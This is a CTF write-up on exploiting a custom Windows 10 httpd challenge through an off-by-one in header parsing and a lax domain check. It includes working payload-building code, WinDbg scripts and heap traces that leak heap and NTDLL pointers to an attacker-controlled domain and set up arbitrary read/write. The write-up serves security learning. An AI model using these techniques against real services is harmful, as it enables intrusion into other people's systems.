winhttpd writeup: private heaps pwning on Windows

Following last weekend’s Insomni’hack teaser and by popular demand, here is a detailed write-up for my winhttpd challenge, which implemented a custom multi-threaded httpd and was running on the latest version of Windows 10:

This challenge is running on Windows Server 2019, Version 1809 (OS Build 17763.253).

Since multi-threaded servers have obvious isolation issues for a CTF challenge, you first had to connect to a dispatcher service, which would spawn an instance for you on a dedicated port that only your IP was allowed to access. You could then send as many requests to the httpd as you liked, as long as the instance didn’t crash and you kept the dispatcher socket open.

It all starts with a HeapCreate

The server limits the number of concurrent requests to 5, and each request runs in a dedicated thread, which creates a private heap with HeapCreate(0, 0, 0) and finally destroys it with HeapDestroy(hHeap) when the request terminates.
This means that every request has a clean heap and cannot interfere with other requests’ heaps (yet), making it far easier to have deterministic allocations since you don’t have to worry about whatever occurs on the main heap or in other threads. On the other hand, you lose whatever pointers you could have leaked from the main heap.
Private heaps have their own LFH and thus we also start with no LFH enabled, so we can avoid the LFH randomization altogether as long as we don’t create too many objects of the same size.

After opening several threads we can observe that we get the following heaps:

0:006> !heap
Index   Address  Name      Debugging options enabled
  1:   17ccd2c0000                
  2:   17ccd0b0000                
  3:   17ccd220000                
  4:   17ccd4e0000                
  5:   17ccd260000                
  6:   17ccd6d0000                
  7:   17ccd460000                
  8:   17ccd590000

As you can see:

  • unlike mmap on (non-grsec) Linux, all heaps are mapped in memory at random offsets; therefore leaking a heap address doesn’t mean we can immediately leak other heaps or libraries
  • all new heaps are aligned on 0x10000; that could come in handy for partial overwrites, however I didn’t actually use it in my exploit 😛
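The alignment claim is easy to double-check by masking the low 16 bits of the addresses printed by !heap above. This is only a small sanity-check sketch; the variable names are mine and the addresses are specific to this run.

```python
# Heap base addresses copied from the !heap output above (one run only).
heaps = [
    0x17ccd2c0000, 0x17ccd0b0000, 0x17ccd220000, 0x17ccd4e0000,
    0x17ccd260000, 0x17ccd6d0000, 0x17ccd460000, 0x17ccd590000,
]

HEAP_ALIGN = 0x10000  # alignment observed in this run

# Any address with non-zero low 16 bits would contradict the observation.
unaligned = [hex(h) for h in heaps if h & (HEAP_ALIGN - 1)]
print("unaligned heaps:", unaligned)
```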

The bugs

The httpd itself doesn’t do much: you can only read local files (without traversal) or log in. The login takes username/password/domain parameters, and just greets you if the credentials are valid, or fails. The domain parameter has to be either empty or start with “win.local”, which is the first bug since you can send “win.local.mydomain.com”. This will cause the httpd to open a socket on port 12345 to your domain, send “<username>::<password>” on that socket, and wait for the authentication response.
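To make the first bug concrete, here is a minimal Python model of the domain check as described above. It assumes the server does a plain prefix comparison; the function names and the stricter variant are hypothetical and not taken from the challenge sources.

```python
ALLOWED_PREFIX = "win.local"

def domain_accepted(domain: str) -> bool:
    """Model of the described check: empty, or merely *starts with* the prefix."""
    return domain == "" or domain.startswith(ALLOWED_PREFIX)

def domain_accepted_strict(domain: str) -> bool:
    """Hypothetical stricter check: only the exact domain (or none) is allowed."""
    return domain in ("", ALLOWED_PREFIX)

attacker_domain = "win.local.mydomain.com"
print(domain_accepted(attacker_domain))         # the prefix check lets it through
print(domain_accepted_strict(attacker_domain))  # an exact match would not
```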

The other bug lies in the custom strcpy_n function that is used to store various variables in the following http_request struct (which is also stored on the heap shortly after the thread creation):

typedef struct {
    char *key;
    char *value;
} dictionary_entry, *dictionary;

typedef struct {
    SOCKET sockfd;
    HANDLE heap;
    char method[16];
    char filename[256];
    char *query_string;
    char protocol[16];
    char hostname[128];
    dictionary headers;
    size_t headers_count;
    dictionary params; /* GET & POST params */
    size_t params_count;
    char *content; /* POST content */
    size_t content_length;
} http_request;

That function has a NULL off-by-one bug, and is called in the following contexts:

strcpy_n(req->method, cursor, sizeof(req->method));

⇨ overflows filename[0], useless (also the method is invalid so request aborts)

strcpy_n(req->filename, cursor, sizeof(req->filename));

⇨ overflows the first byte of query_string, which could be nice however the query_string isn’t allocated yet (NULL)

req->query_string = (char*)HeapAlloc(req->heap, 0, ptr - cursor + 1);
strcpy_n(req->query_string, cursor, ptr - cursor);

⇨ no overflow

strcpy_n(req->protocol, cursor, sizeof(req->protocol));

⇨ overflows hostname[0], useless

if (!_stricmp(key, "Host") && !*req->hostname) {
    strcpy_n(req->hostname, value, sizeof(req->hostname));

⇨ overflows the headers pointer (pointer to a dictionary, which is an array of key-value pointers)

Only the last one is interesting as it means we can make the headers dictionary – which I’ll refer to as headers** from now on – point to controlled memory.
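The effect of the off-by-one on the headers pointer can be simulated in a few lines of Python. This is a sketch under assumptions: the field offsets are derived from the struct above for x64 (they add up to 0x1e8, which matches the http_request allocation size in the WinDbg traces later in this write-up), the behaviour of strcpy_n is modelled from the description rather than from the sources, and the pointer value is just an example taken from the first trace.

```python
import struct

# Offsets implied by the http_request struct with 8-byte pointers/handles.
OFF_HOSTNAME = 0x138
HOSTNAME_SIZE = 128
OFF_HEADERS = OFF_HOSTNAME + HOSTNAME_SIZE  # 0x1b8, right after hostname[]
STRUCT_SIZE = 0x1e8

def strcpy_n(buf: bytearray, dst_off: int, src: bytes, n: int) -> None:
    """Assumed behaviour: copy at most n bytes, then write the terminating
    NUL right after them, i.e. one byte past the buffer when len(src) >= n."""
    data = src[:n]
    buf[dst_off:dst_off + len(data)] = data
    buf[dst_off + len(data)] = 0  # the off-by-one NUL

req = bytearray(STRUCT_SIZE)
struct.pack_into("<Q", req, OFF_HEADERS, 0x17ccd222e80)  # example headers pointer

strcpy_n(req, OFF_HOSTNAME, b"X" * 128, HOSTNAME_SIZE)

headers_ptr = struct.unpack_from("<Q", req, OFF_HEADERS)[0]
print(hex(headers_ptr))  # least significant byte is now 0x00
```

Because the pointer is stored little-endian, the stray NUL clears its least significant byte, so the dictionary pointer moves down to the previous 0x100 boundary.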
During the parsing of HTTP headers, key-value pairs are added to the headers dictionary by a dict_add() function:

  • the program loops up to req->headers_count times to check if the same header name already exists
  • if it doesn’t, a new key and value are allocated with HeapAlloc()
    • then the dictionary gets extended with HeapReAlloc() and the new pair is appended to the dictionary
  • if it does, the key remains unchanged
    • if the new value’s length is <= strlen(prev_value), the previous bytes are just overwritten in place
    • if it is not, the value gets extended with HeapReAlloc()

So if the headers** points in controlled memory, the parsing of next headers could lead to an arbitrary write by editing a valid key with a value that points wherever we want.
Headers are never printed by the application and thus can’t be used directly for an arbitrary read.
dict_add() is also used to add key-value pairs to the params** dictionary.
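The dict_add() behaviour described above can be summarised with a toy Python model. It is not the challenge code: the dictionary is a plain list of [key, value] pairs and the function only returns a label for the heap operation that the described logic would perform.

```python
def dict_add(entries: list, key: bytes, value: bytes) -> str:
    """Toy model of the described logic; returns the heap operation performed."""
    for entry in entries:            # one iteration per existing entry
        if entry[0] == key:          # every stored key pointer gets dereferenced
            grows = len(value) > len(entry[1])
            entry[1] = value
            return "HeapReAlloc(value)" if grows else "edit in place"
    first = not entries              # the very first entry allocates the dictionary
    entries.append([key, value])
    return "HeapAlloc(dict)" if first else "HeapReAlloc(dict)"

headers = []
ops = [
    dict_add(headers, b"X", b"Y" * 0x30),         # new key, dictionary created
    dict_add(headers, b"X", b"Y" * 0x50),         # same key, longer value
    dict_add(headers, b"A" * 0x40, b"B" * 0x40),  # new key, dictionary extended
    dict_add(headers, b"X", b"Y"),                # same key, shorter value
]
print(ops)
```

The important detail for the exploit is the loop: every existing key pointer is dereferenced before anything else happens, so a fake dictionary must only contain pointers that are safe to read.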

The initial leak

Before we go further we need an initial leak to bypass ASLR.
If we manage to put the headers** on top of a valid chunk, we can add a new header to cause a HeapReAlloc on that chunk without having to worry about messing up the allocator’s metadata (inlined or not): as far as the allocator is concerned, this is a valid request.
If the new size is more than that of the chunk we overlap with, the allocator will try to extend it. If there is enough free space adjacent to the chunk, that will be used and will just increase the size of our chunk, otherwise it’ll allocate new memory and free the old chunk, thereby allowing us to free the overlapped chunk.

Now there’s a catch: before the headers** gets HeapReAlloc()‘ed, dict_add checks if the new header we’re adding exists already, and will therefore loop against all entries of headers**. Since our off-by-one bug gets triggered on a headers** that has at least one entry (the “Host” header itself), dict_add will always try to dereference a key pointer at least once, which is problematic since we haven’t bypassed ASLR yet.

The idea here is that we can use KUSER_SHARED_DATA, a section of memory that is always mapped at 0x7ffe0000 – as can be observed with !address in WinDbg.

0:007> !address

        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
--------------------------------------------------------------------------------------------------------------------------
+        0`00000000        0`7ffe0000        0`7ffe0000             MEM_FREE    PAGE_NOACCESS                      Free       
+        0`7ffe0000        0`7ffe1000        0`00001000 MEM_PRIVATE MEM_COMMIT  PAGE_READONLY                      Other      [User Shared Data]
+        0`7ffe1000        0`7ffe6000        0`00005000             MEM_FREE    PAGE_NOACCESS                      Free       
+        0`7ffe6000        0`7ffe7000        0`00001000 MEM_PRIVATE MEM_COMMIT  PAGE_READONLY                      <unknown>  [.........5......]
+        0`7ffe7000       bb`f1490000       bb`714a9000             MEM_FREE    PAGE_NOACCESS                      Free       
+       bb`f1490000       bb`f158a000        0`000fa000 MEM_PRIVATE MEM_RESERVE                                    Stack      [~0; 4f8.13c8]
[...]
0:007> dt nt!_KUSER_SHARED_DATA 0x7ffe0000
ntdll!_KUSER_SHARED_DATA
   +0x000 TickCountLowDeprecated : 0
   +0x004 TickCountMultiplier : 0xfa00000
   +0x008 InterruptTime    : _KSYSTEM_TIME
   +0x014 SystemTime       : _KSYSTEM_TIME
   +0x020 TimeZoneBias     : _KSYSTEM_TIME
   +0x02c ImageNumberLow   : 0x8664
   +0x02e ImageNumberHigh  : 0x8664
   +0x030 NtSystemRoot     : [260]  "C:\WINDOWS" 
   +0x238 MaxStackTraceDepth : 0
   +0x23c CryptoExponent   : 0
[...]

That doesn’t contain any useful pointer for us on Windows 10, but it is perfect to survive a pointer dereference. So we just craft a fake header that points to the NtSystemRoot, which is "C\x00" (unicode string).
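As a quick illustration of why NtSystemRoot is a safe dereference target, the sketch below encodes the string as UTF-16LE and shows what a byte-oriented string function sees. It also builds the fake dictionary with the standard struct module instead of pwntools’ p64; the helper name is mine.

```python
import struct

KUSER_SHARED_DATA = 0x7ffe0000
NT_SYSTEM_ROOT = KUSER_SHARED_DATA + 0x30  # offset from the dt output above

def as_c_string(raw: bytes) -> bytes:
    """What a byte-oriented strlen/strcmp sees: everything up to the first NUL."""
    return raw.split(b"\x00", 1)[0]

nt_system_root = "C:\\WINDOWS".encode("utf-16-le")
print(as_c_string(nt_system_root))  # b'C'

# Six little-endian qwords, i.e. three key/value pairs that all point to "C".
fake_headers = struct.pack("<Q", NT_SYSTEM_ROOT) * 6
print(fake_headers.hex())
```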

The GET parameters stored in params** have a urldecoded value, which allows us to store NULL bytes in the value. Furthermore, the username and password params can be leaked over the “domain” socket, so we can craft our fake headers** in one of them and then free that value. The allocator will insert a FreeList entry (Flink + Blink) inside the free chunk, so printing the value leaks the Flink and thus the position of the heap!

Let’s see how it works. First we register a few breakpoints to pretty-print our allocations:

bp ntdll!RtlAllocateHeap "r @$t1 = @rcx ; r @$t2 = @edx ; r @$t3 = @r8; g"
bp ntdll!RtlReAllocateHeap "r @$t4 = @rcx ; r @$t5 = @edx ; r @$t6 = @r8; r $t7 = @r9 ; g"
bp winhttpd+24C5 ".printf \"----------------------------------------------------------------------------------------------------\\nNew Heap @ %#p\\n\", @rax ; g"
bp winhttpd+24DD ".printf \"req_head          : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+2508 ".printf \"http_request      : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+2732 ".printf \"req->content      : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+213A ".printf \"req->query_string : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+36DE ".printf \"    dict_add new key       :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+3715 ".printf \"    dict_add new value     :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+374C ".printf \"    dict_add realloc value : HeapReAlloc(%#p, %#x, %#p, %#p) -> %#p\\n\", @$t4, @$t5, @$t6, @$t7, @rax ; g"
bp winhttpd+37FF ".printf \"    dict_add realloc dict  : HeapReAlloc(%#p, %#x, %#p, %#p) -> %#p\\n\", @$t4, @$t5, @$t6, @$t7, @rax ; g"
bp winhttpd+37D0 ".printf \"    dict_add new dict      :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+1D20 ".printf \"Parsing params...\\n\" ; g"
bp winhttpd+22C8 ".printf \"Parsing header...\\n\" ; g"
g

This is the payload I used:

fake_headers = p64(_KUSER_SHARED_DATA + 0x30) * 6

payload = "POST "
payload += "/login?domain=win.local.w3challs.com&password=" + "A" * 0x100 + "&username=" + urlencode(fake_headers) # [1]
payload += " HTTP/1.1\r\n"
payload += "X: " + "Y" * 0x30 + "\r\n"             # [2]
payload += "X: " + "Y" * 0x50 + "\r\n"             # [3]
payload += "A" * 0x40 + ": " + "B" * 0x40 + "\r\n" # [4]
payload += "Host: " + 'X' * 128 + "\r\n"           # [5] trigger off-by-one on headers**
payload += "Z" * 0x40 + ": " + "B" * 0x40 + "\r\n" # [6] HeapReAlloc(headers**) => HeapFree(params[username].value)
payload += "\r\n"

Allocations observed in WinDbg:

0:003> g
----------------------------------------------------------------------------------------------------
New Heap @ 0x17ccd220000
req_head          : HeapAlloc(0x17ccd220000, 0, 0x2000) -> 0x17ccd220860
http_request      : HeapAlloc(0x17ccd220000, 0, 0x1e8) -> 0x17ccd222870
req->query_string : HeapAlloc(0x17ccd220000, 0, 0x1c9) -> 0x17ccd222a60
Parsing params...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x7) -> 0x17ccd222c40
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x17) -> 0x17ccd222c60
    dict_add new dict      :   HeapAlloc(0x17ccd220000, 0, 0x10) -> 0x17ccd222c80
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x9) -> 0x17ccd222ca0
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x101) -> 0x17ccd222cc0
    dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222c80, 0x20) -> 0x17ccd222dd0
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x9) -> 0x17ccd222c80
[1] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x31) -> 0x17ccd222e00
    dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222dd0, 0x30) -> 0x17ccd222e40
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x2) -> 0x17ccd222dd0
[2] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x31) -> 0x17ccd222e80
[2] dict_add new dict      :   HeapAlloc(0x17ccd220000, 0, 0x10) -> 0x17ccd222ec0
Parsing header...
[3] dict_add realloc value : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e80, 0x51) -> 0x17ccd222ee0
Parsing header...
[4] dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd222f40
[4] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd222f90
[4] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222ec0, 0x20) -> 0x17ccd222e80
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x5) -> 0x17ccd222ec0
[5] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x81) -> 0x17ccd222fe0
[5] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e80, 0x30) -> 0x17ccd222e80
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd223070
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd2230c0
[6] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e00, 0x40) -> 0x17ccd223110
[...]
0:006> dps 0x17ccd222e00 L6
0000017c`cd222e00  0000017c`cd223160 [6]
0000017c`cd222e08  0000017c`cd220150 [6]
0000017c`cd222e10  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e18  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e20  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e28  00000000`7ffe0030 SharedUserData+0x30

Step-by-step explanation:

  • At [1] we managed to get the username (params[2].value) aligned on 0x100.
  • At [2] we create a header value whose size is 0x30* ; the headers** size is now 0x10
  • At [3] we realloc that header’s value, leaving a free chunk of size 0x30 available
  • At [4] we create another header, the headers** size is now 0x20, we use a key and value that are larger than 0x30 to avoid consuming the free 0x30 chunk
  • At [5] we perform the off-by-one
    • first the “Host” header is added, the headers** size becomes 0x30, and thus it reuses the free 0x30 chunk
    • the headers** LSBs change from 2e80 to 2e00 because of the off-by-one ⇨ headers** == params[2].value
  • At [6] we add another header, which causes HeapReAlloc to free headers** and allocate headers** further in the heap
    • the allocator puts its Flink and Blink freelist pointers in params[2].value, which we will leak over our “domain socket”

Note*: 0x30 is not the real size: I forgot to account for the terminating NULL bytes and the size of the metadata in my calculations. It doesn’t matter; what matters is the plan 😉: an alloc of 0x41 doesn’t fit into a chunk allocated for 0x31.
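For the curious, the spacing between consecutive chunks in the trace above is consistent with a simple rule: add 8 bytes, round up to 0x10, with a minimum of 0x20. The sketch below is only an empirical fit to this trace, not a documented formula of the NT heap, and the function name is mine.

```python
def chunk_stride(requested: int) -> int:
    """Empirical fit to the trace above (NOT a documented allocator formula)."""
    return max(0x20, (requested + 8 + 0xf) & ~0xf)

# (requested size, returned address, address of the next chunk) from the trace
observed = [
    (0x17,  0x17ccd222c60, 0x17ccd222c80),
    (0x101, 0x17ccd222cc0, 0x17ccd222dd0),
    (0x31,  0x17ccd222e00, 0x17ccd222e40),
    (0x51,  0x17ccd222ee0, 0x17ccd222f40),
    (0x41,  0x17ccd222f40, 0x17ccd222f90),
    (0x81,  0x17ccd222fe0, 0x17ccd223070),
]
for size, addr, next_addr in observed:
    assert addr + chunk_stride(size) == next_addr

# The plan in numbers: a 0x30-byte headers** fits the chunk freed at [3],
# while the 0x41-byte key and value from [4] do not.
print(hex(chunk_stride(0x31)), hex(chunk_stride(0x30)), hex(chunk_stride(0x41)))
```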

Because at the end of the request handle_client calls HeapFree on all previously allocated pointers, we want to keep our “domain” socket open as long as possible to avoid a crash. That also avoids the HeapDestroy call which would destroy our heap before we can even use our leak.
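Turning the leaked bytes into a heap base can be sketched as follows. The assumptions are that the value arrives as a C string (so it stops at the first NUL byte), that the leaked Flink lies within the first 0x10000 bytes of the heap, and that heaps are aligned on 0x10000 as observed earlier. The helper names are mine, and extracting the username from the “<username>::<password>” message is left out.

```python
import struct

HEAP_ALIGN = 0x10000  # alignment observed with !heap

def parse_leaked_pointer(data: bytes) -> int:
    """Rebuild a 64-bit pointer from a NUL-terminated, little-endian leak."""
    raw = data.split(b"\x00", 1)[0][:8]
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]

def heap_base(ptr: int) -> int:
    """Mask the low bits, relying on the 0x10000 alignment of heap bases."""
    return ptr & ~(HEAP_ALIGN - 1)

# Flink value from the dps output above, as it would appear on the wire.
leak = parse_leaked_pointer(bytes.fromhex("603122cd7c01"))
print(hex(leak), hex(heap_base(leak)))
```

If one of the low bytes of the pointer happens to be 0x00, the string is cut short and the reconstructed value is wrong, which is one way such a leak can occasionally fail.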

Leaking NTDLL

winhttpd doesn’t store any function pointer or pointer to its .data section. We’re in a clean heap, is there anything useful for us in there?

All pointers seem to point inside the current heap except this one:

0:006> dps 0x17ccd220000 L100
[...]
0000017c`cd2202b8  00000000`001fe000
0000017c`cd2202c0  00007ff8`92b33d10 ntdll!RtlpStaticDebugInfo+0x90
0000017c`cd2202c8  00000000`ffffffff
[...]

This is great because we always can find a pointer into NTDLL. Now we need a strategy to leak its value.
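In numbers, and only for this exact build, the relationship between the heap, the pointer and the NTDLL base looks like this. The 0x2c0 offset comes from the dump above; the 0x163d10 offset is simply the difference between the leaked pointer and the NTDLL base reported by the exploit output near the end of this write-up, so treat both as build-specific assumptions.

```python
NTDLL_PTR_OFFSET_IN_HEAP = 0x2c0  # heap+0x2c0 holds the pointer in the dump above
LEAK_OFFSET_IN_NTDLL = 0x163d10   # (RtlpStaticDebugInfo+0x90) - ntdll base, this build only

def ntdll_leak_addr(heap_base: int) -> int:
    """Address to read in order to obtain the NTDLL pointer."""
    return heap_base + NTDLL_PTR_OFFSET_IN_HEAP

def ntdll_base_from_leak(leak: int) -> int:
    """Rebase the leaked pointer to the start of the NTDLL image."""
    return leak - LEAK_OFFSET_IN_NTDLL

addr = ntdll_leak_addr(0x17ccd220000)
base = ntdll_base_from_leak(0x7ff892b33d10)
print(hex(addr), hex(base))
```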

Arbitrary read/write

To obtain an arbitrary write primitive we can overwrite the pointers inside headers** and params**. params** is more interesting though because we can also leak the values if the param key is either username or password.

Therefore we will want to overlap headers** and params** and once again cause a HeapReAlloc(headers**) to free the params** chunk.

Payload:

content = "A=" + urlencode(flat(  # [8]
    username_heap_thread_1, ntdll_leak_addr,
    password_heap_thread_1, CommitRoutine_mangled_addr, # spoil for later :P
    password_heap_thread_1, CommitRoutine_mangled_addr,
)) + "&domain=win.local.w3challs.com&" + "&" * 0x100

payload  = "POST "
payload += '/login?a=AAAAAAAAAAAAAAAA&password=' + 'A' * 0xa0 + '&username=BBBBBBBB&username=' + urlencode(fake_headers) # [1]
payload += " HTTP/1.1\r\n"
payload += "Host: " + 'X' * 128 + "\r\n" # [2]
payload += "username: Y\r\n"             # [3]
payload += "X: Y\r\n"                    # [4]
payload += "Content-Length: " + str(len(content)) + "\r\n" # [5]
payload += "X: " + "Y" * 0x50 + "\r\n"   # [6]
payload += "\r\n"
payload += content                       # [7]

Allocations observed in WinDbg:

----------------------------------------------------------------------------------------------------
New Heap @ 0x17ccd260000
req_head          : HeapAlloc(0x17ccd260000, 0, 0x2000) -> 0x17ccd260860
http_request      : HeapAlloc(0x17ccd260000, 0, 0x1e8) -> 0x17ccd262870
req->query_string : HeapAlloc(0x17ccd260000, 0, 0x110) -> 0x17ccd262a60
Parsing params...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262b80
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x11) -> 0x17ccd262ba0
    dict_add new dict      :   HeapAlloc(0x17ccd260000, 0, 0x10) -> 0x17ccd262bc0
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262be0
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0xa1) -> 0x17ccd262c00
    dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262bc0, 0x20) -> 0x17ccd262cb0
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262bc0
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262ce0
[1] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262cb0, 0x30) -> 0x17ccd262d00
    dict_add realloc value : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262ce0, 0x11) -> 0x17ccd262cb0
Parsing header...
[2] dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x5) -> 0x17ccd262ce0
[2] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x81) -> 0x17ccd262d40
[2] dict_add new dict      :   HeapAlloc(0x17ccd260000, 0, 0x10) -> 0x17ccd262dd0
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262df0
[3] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e10
[3] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x20) -> 0x17ccd262d00
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e30
[4] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e50
[4] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x30) -> 0x17ccd262d00
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0xf) -> 0x17ccd262e70
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x4) -> 0x17ccd262e90
[5] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x40) -> 0x17ccd262eb0
Parsing header...
[6] dict_add realloc value : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262e50, 0x51) -> 0x17ccd262f00
[7] req->content      : HeapAlloc(0x17ccd260000, 0, 0x1b2) -> 0x17ccd262f60
Parsing params...
[8] dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e50
[8] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x31) -> 0x17ccd262d00
[8] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x40) -> 0x17ccd263120
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0x80000a, 0x1ca8) -> 0x17ccd262d00
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x17) -> 0x17ccd262d20
    dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd263120, 0x50) -> 0x17ccd260750
[...]
0:006> da poi(0x17ccd260750)
0000017c`cd222c80  "username"
0:006> dps poi(0x17ccd260750+8) L1
0000017c`cd2202c0  00007ff8`92b33d10 ntdll!RtlpStaticDebugInfo+0x90

Step-by-step explanation:

  • At [1] we managed to get params** aligned with 0x100
  • At [2] we perform the off-by-one
    • first the “Host” header is added and reuses the old "BBBBBBBB" username, the headers** is created with a size of 0x10
    • the headers** LSBs change from 2dd0 to 2d00 because of the off-by-one ⇨ headers** == params**
  • At [3] we add a header, which is actually an old test that I forgot to remove 😜
    • the headers** size is now 0x20, this still fits in the original size of params**: 0x30. Therefore this doesn’t free or move it.
  • At [4] we add another header with a small value
    • the headers** size is now 0x30, which still fits in the original size of params**
  • At [5] we add the Content-Length header, which is mandatory to send POST params
    • it makes sure there’s an allocated chunk after the value of [4]
    • the headers** size becomes 0x40, which causes HeapReAlloc to free headers** and allocate it further in the heap
      • params** is now free
  • At [6] we edit the value of [4], causing a HeapReAlloc
    • since the chunk can’t be extended that much anymore, it frees it and moves it further in the heap
    • we now have a small chunk available for next step
  • At [7] the POST content is allocated, this doesn’t fit in free chunks and therefore gets allocated at the end of the heap
  • At [8] the first POST param is added to params**
    • All pointers in params** can be dereferenced: the program doesn’t crash
    • the key reuses our previously freed small chunk
    • the value overlaps with the free params** itself so we now fully control the values inside params** ⇨ arbitrary read/write
    • params** gets reallocated, but keeps our crafted key-value pairs

Note that the arbitrary write is limited: we can only edit up to strlen(target) anywhere in memory.
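To see what this limit means in practice, the sketch below counts how many bytes can be edited at a target, given its current content. The two example values are taken from the nt!_HEAP dump shown further down; the helper name is mine.

```python
import struct

def writable_len(current: bytes) -> int:
    """Bytes editable in place: strlen() of the data currently at the target."""
    nul = current.find(b"\x00")
    return len(current) if nul < 0 else nul

# Current qword values of two interesting targets (from the nt!_HEAP dump).
segment_list_entry = struct.pack("<Q", 0x0000017ccd220120)
commit_routine = struct.pack("<Q", 0xf603ad6b90e97029)

print(writable_len(segment_list_entry))  # 6: the two top bytes are already zero
print(writable_len(commit_routine))      # 8: no NUL byte in the mangled value
```

Six bytes are enough to replace one user-space pointer with another, since the two most significant bytes are zero in both.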

The heap CommitRoutine callback

With the NTDLL base leaked I have no doubt you can find interesting pointers. Many of them seem available but are mangled and without names, which isn’t very cool. You could also leak the TEB and thus other libraries too, unlocking more targets.

On the other hand, out of curiosity, I wanted to see what the heap structure looks like. The lame way to find its name (which I used of course) was to google “heap structure windows”, which returns this paper as a first result, then try several of the mentioned structures until one seems legit. Here nt!_HEAP looked ok 🙂

0:006>dt nt!_HEAP 0x17ccd220000
ntdll!_HEAP
   +0x000 Segment          : _HEAP_SEGMENT
   +0x000 Entry            : _HEAP_ENTRY
   +0x010 SegmentSignature : 0xffeeffee
   +0x014 SegmentFlags     : 2
   +0x018 SegmentListEntry : _LIST_ENTRY [ 0x0000017c`cd220120 - 0x0000017c`cd220120 ]
   +0x028 Heap             : 0x0000017c`cd220000 _HEAP
   +0x030 BaseAddress      : 0x0000017c`cd220000 Void
   +0x038 NumberOfPages    : 0xf
[...]
   +0x150 FreeLists        : _LIST_ENTRY [ 0x0000017c`cd222e00 - 0x0000017c`cd223160 ]
   +0x160 LockVariable     : 0x0000017c`cd2202c0 _HEAP_LOCK
   +0x168 CommitRoutine    : 0xf603ad6b`90e97029     long  +f603ad6b90e97029
   +0x170 StackTraceInitVar : _RTL_RUN_ONCE
   +0x178 CommitLimitData  : _RTL_HEAP_MEMORY_LIMIT_DATA
   +0x198 FrontEndHeap     : (null) 
   +0x1a0 FrontHeapLockCount : 0
   +0x1a2 FrontEndHeapType : 0 ''
   +0x1a3 RequestedFrontEndHeapType : 0 ''
   +0x1a8 FrontEndHeapUsageData : 0x0000017c`cd220750  ""
   +0x1b0 FrontEndHeapMaximumIndex : 0x80
   +0x1b2 FrontEndHeapStatusBitmap : [129]  ""
   +0x238 Counters         : _HEAP_COUNTERS
   +0x2b0 TuningParameters : _HEAP_TUNING_PARAMETERS

